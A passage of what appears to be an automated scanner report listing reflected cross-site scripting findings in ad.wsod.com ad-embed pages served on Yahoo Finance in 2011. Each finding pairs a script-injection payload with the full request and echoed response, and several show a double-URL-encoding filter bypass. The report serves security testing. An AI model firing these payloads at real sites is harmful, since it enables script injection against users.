P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2498

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
ce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*27167"><script>alert(1)</script>e45a8d5565ahttp://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.106. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 460db"-alert(1)-"2523358bd68 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*&460db"-alert(1)-"2523358bd68=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2474

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
e805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*&460db"-alert(1)-"2523358bd68=1">
...[SNIP]...

1.107. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d7a3"><script>alert(1)</script>904b1f0a7a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*&2d7a3"><script>alert(1)</script>904b1f0a7a4=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2504

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
e805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*&2d7a3"><script>alert(1)</script>904b1f0a7a4=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.108. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1300827954** [10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1300827954**

Issue detail

The value of the 10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6278d'-alert(1)-'7ee5cbd0701 was submitted in the 10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1300827954**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*6278d'-alert(1)-'7ee5cbd0701 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:11:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:11:57 GMT; path=/
Set-Cookie: i_1=46:475:832:132:0:42331:1300828317:L|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2; expires=Thu, 21-Apr-2011 21:11:57 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 737

   function wsod_image475() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*6278d'-alert(1)-'7ee5cbd0701http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.832.iframe.200x33/**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out more
...[SNIP]...

1.109. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1300827954** [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1300827954**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c61f0'-alert(1)-'0857629a808 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/1300827954**;10,2,154;1920;1200;http%3A_@2F_@2Ffinance.yahoo.com_@2F?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*&c61f0'-alert(1)-'0857629a808=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/475.0.iframe.200x33/0.5882761480752379?click=http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2|46:681:477:0:0:38100:1300827690:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:12:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d650010b6706; expires=Fri, 22-Apr-2011 21:12:14 GMT; path=/
Set-Cookie: i_1=46:475:844:132:0:42331:1300828334:L|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2; expires=Thu, 21-Apr-2011 21:12:14 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 744

   function wsod_image475() {
       document.write('<a href="http://global.ard.yahoo.com/SIG=15jce805f/M=791401.14629007.14426716.2175760/D=fin/S=7037371:RQ/Y=YAHOO/EXP=1300835147/L=gxMr30wNcmBqhH8YTVvEVQLKrcHW802JDyoACwzt/B=N5SeRUwNPP0-/J=1300827947273781/K=Rv15.FaMQiTW2euLzl2Lrg/A=6304417/R=0/*&c61f0'-alert(1)-'0857629a808=1http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/475.844.iframe.200x33/**;10.2154;1920;1200;http:_@2F_@2Ffinance.yahoo.com_@2F" target="_blank" title="Online $7 Trades! Click to find out mo
...[SNIP]...

1.110. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c69b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1ee33c46e6 was submitted in the REST URL parameter 2. This input was echoed as 8c69b"><script>alert(1)</script>a1ee33c46e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a6313578c69b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1ee33c46e6/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2682

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a6313578c69b"><script>alert(1)</script>a1ee33c46e6/477.0.iframe.150x30/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.111. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75a2d%2522%253balert%25281%2529%252f%252f9b048b2d465 was submitted in the REST URL parameter 2. This input was echoed as 75a2d";alert(1)//9b048b2d465 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a63135775a2d%2522%253balert%25281%2529%252f%252f9b048b2d465/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2637

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a63135775a2d";alert(1)//9b048b2d465/477.0.iframe.150x30/1300830283**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2
...[SNIP]...

1.112. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b53f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4e79a71ebb9 was submitted in the REST URL parameter 3. This input was echoed as b53f9"><script>alert(1)</script>4e79a71ebb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30b53f9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4e79a71ebb9/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:44:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2682

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30b53f9"><script>alert(1)</script>4e79a71ebb9/?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&" target="_blank" border="0" style="border:0px;">
...[SNIP]...

1.113. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5c2a%2522%253balert%25281%2529%252f%252f2ded99f30ec was submitted in the REST URL parameter 3. This input was echoed as e5c2a";alert(1)//2ded99f30ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30e5c2a%2522%253balert%25281%2529%252f%252f2ded99f30ec/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/* HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:45:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 2637

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30e5c2a";alert(1)//2ded99f30ec/1300830300**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=21422
...[SNIP]...

1.114. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee26d"><script>alert(1)</script>3c4129e8ac6 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/477.0.iframe.150x30/0.12785461149178445?yhdata=ycg=&yyob=&zip=,&ybt=17;89;274;8319&click=http://global.ard.yahoo.com/SIG=15n8i8m1a/M=791401.14523143.14352822.2140147/D=fin/S=2142202388:NE3/Y=YAHOO/EXP=1300835408/L=HxzDrUwNcmBqhH8YTVvEVQCurcHW802JEDAABtwy/B=BCp8UmKImjI-/J=1300828208505883/K=o6O4PDkA5Dj6seEeUVh5rQ/A=6304025/R=0/*ee26d"><script>alert(1)</script>3c4129e8ac6 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://finance.yahoo.com/news;_ylt=Ag9ozvEv79CyQnz4pgKYSfO7YWsA;_ylu=X3oDMTFocGxlc3RsBHBvcwMxNARzZWMDeWZpTmF2VG9wbmF2TWFpbkxpbmtzBHNsawNuZXdzYW1wb3Bpbmk-
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4d650010b6706; i_1=46:475:801:132:0:38101:1300827956:B2|46:675:22:0:0:38100:1300827951:B2|33:1359:827:0:0:38100:1300827757:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 22 Mar 2011 21:43:43 GMT
